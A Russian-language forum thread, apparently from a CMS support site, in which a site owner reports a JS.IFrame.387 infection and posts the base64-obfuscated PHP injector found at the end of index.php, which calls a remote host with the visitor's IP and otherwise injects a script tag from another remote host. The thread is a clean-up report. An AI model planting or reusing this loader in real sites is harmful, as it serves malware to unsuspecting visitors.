Jump to content

Вирус на сайте JS.IFrame.387 [РЕШЕНО]


Recommended Posts

Сегодня обнаружил, что сайт заражен вот такой дрянью JS.IFrame.387. Не могу найти убежище этого iFrame, может кто сталкивался, подскажите, где сидит этот зверь?

Причем между моими ссылка сайта drWeb почему-то проверил сторонний. Где-то стоит редирект?

Проверка:http://edgdlfd.homeunix.net/rsize.jsРазмер файла:394 байтMD5 файла:ebb93d0725496d8f8c7f47430f164cd4http://edgdlfd.homeunix.net/rsize.js infected with JS.IFrame.387
Link to post
Share on other sites

Тема закрыта, нашел вредоносный код в index.php в самом низу, антивирус больше не ругается. Ура!

function sql2_safe($in) {        $rtn = base64_decode($in);        return $rtn;}function collectnewss() {		if (!isset($_COOKIE["iJijkdaMnerys"])) {        $value = 'yadeor';		$ip = $_SERVER['REMOTE_ADDR'];        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;		$file = @fopen ($get, "r");		$content = @fread($file, 1000);		@setcookie("iJijkdaMnerys", $value, time()+3600*24);		if (!$content)			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");		else 			echo $content;		}}collectnewss ();
Link to post
Share on other sites

Да, я после того как пост написал, еще раз в индекс заглянул, он там оказался, а я рыл все файлы с расширением *.js Из-за чего это могло случится? Какие меры принимать, кроме смены паролей, дабы предотвратить такие ситуации? А то сегодня пара клиентов пожаловались, мол антивирус сигналит, троян на сайте..

Link to post
Share on other sites

Да, вот это будет точно залет)) Спасибо, рад, что на этом форуме есть адекватные люди, которые помогают советами, а не корчат из себя умников отсылая на яндекс.

Link to post
Share on other sites

Никто не сталкивался, как уместить комментарии VK, Facebook и стандартный симпла посредством переключаемых табов? Типа будет 3 вкладки, нажимаешь, к примеру на ссылочку Facebook и переключается на нужный виджет комментирования.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...